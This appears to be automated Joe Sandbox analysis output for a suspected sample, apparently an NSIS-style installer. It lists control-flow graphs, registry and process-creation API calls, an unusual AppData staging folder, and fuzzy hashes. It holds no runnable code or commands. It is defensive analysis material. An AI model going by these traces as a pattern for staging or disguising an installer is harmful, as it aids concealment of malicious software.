                                                                                                                                • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                                                                • Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
                                                                                                                                • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                                                                • Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 716 402bff-402c28 RegOpenKeyExW 717 402c93-402c97 716->717 718 402c2a-402c35 716->718 719 402c50-402c60 RegEnumKeyW 718->719 720 402c62-402c74 RegCloseKey call 40642a 719->720 721 402c37-402c3a 719->721 729 402c76-402c85 720->729 730 402c9a-402ca0 720->730 722 402c87-402c8a RegCloseKey 721->722 723 402c3c-402c4e call 402bff 721->723 725 402c90-402c92 722->725 723->719 723->720 725->717 729->717 730->725 731 402ca2-402cb0 RegDeleteKeyW 730->731 731->725 733 402cb2 731->733 733->717
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                • Opcode ID: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                                                                                                • Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
                                                                                                                                • Opcode Fuzzy Hash: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                                                                                                • Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 734 401bdf-401bf7 call 402ba2 * 2 739 401c03-401c07 734->739 740 401bf9-401c00 call 402bbf 734->740 741 401c13-401c19 739->741 742 401c09-401c10 call 402bbf 739->742 740->739 745 401c1b-401c2f call 402ba2 * 2 741->745 746 401c5f-401c89 call 402bbf * 2 FindWindowExW 741->746 742->741 758 401c31-401c4d SendMessageTimeoutW 745->758 759 401c4f-401c5d SendMessageW 745->759 757 401c8f 746->757 760 401c92-401c95 757->760 758->760 759->757 761 401c9b 760->761 762 402a4c-402a5b 760->762 761->762
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID: !
                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                • Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                                                                • Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
                                                                                                                                • Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                                                                • Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                  • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,74DF23A0), ref: 0040520A
                                                                                                                                  • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                • String ID: `OC
                                                                                                                                • API String ID: 334405425-799166930
                                                                                                                                • Opcode ID: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                                                                • Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
                                                                                                                                • Opcode Fuzzy Hash: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                                                                • Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F47
                                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
                                                                                                                                • RegCloseKey.KERNELBASE(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F8B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                • String ID: : Completed
                                                                                                                                • API String ID: 3677997916-2954849223
                                                                                                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                • Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
                                                                                                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                • Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                  • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,74DF23A0), ref: 0040520A
                                                                                                                                  • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                  • Part of subcall function 00405730: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                                                  • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3585118688-0
                                                                                                                                • Opcode ID: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
                                                                                                                                • Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
                                                                                                                                • Opcode Fuzzy Hash: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
                                                                                                                                • Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                  • Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer,?,00000000,000000F0), ref: 00401645
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer, xrefs: 00401638
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                • String ID: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer
                                                                                                                                • API String ID: 1892508949-463683323
                                                                                                                                • Opcode ID: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                                                                                                • Opcode Fuzzy Hash: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405766
                                                                                                                                Strings
                                                                                                                                • Error launching installer, xrefs: 00405743
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                • String ID: Error launching installer
                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                • Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                                                                • Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
                                                                                                                                • Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                                                                • Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
                                                                                                                                APIs
                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                                                                • Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
                                                                                                                                • Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                                                                • Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 849931509-0
                                                                                                                                • Opcode ID: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
                                                                                                                                • Instruction ID: dc3b8117463452c80c1b03acd1c3af06063939c29d4ce1854e6773ee9d898553
                                                                                                                                • Opcode Fuzzy Hash: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
                                                                                                                                • Instruction Fuzzy Hash: AEF04F32A04110ABEB11BFB59B4EABE72699B80314F15803FF501B71D5D9FC99019629
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405292
                                                                                                                                  • Part of subcall function 00404160: SendMessageW.USER32(00010488,00000000,00000000,00000000), ref: 00404172
                                                                                                                                • CoUninitialize.COMBASE(00000404,00000000), ref: 004052DE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeMessageSendUninitialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2896919175-0
                                                                                                                                • Opcode ID: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
                                                                                                                                • Instruction ID: 7e99d7d4fb8bb12c566fb67139ae5e5ce66cf86df35e622ac950679830b3b0b7
                                                                                                                                • Opcode Fuzzy Hash: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
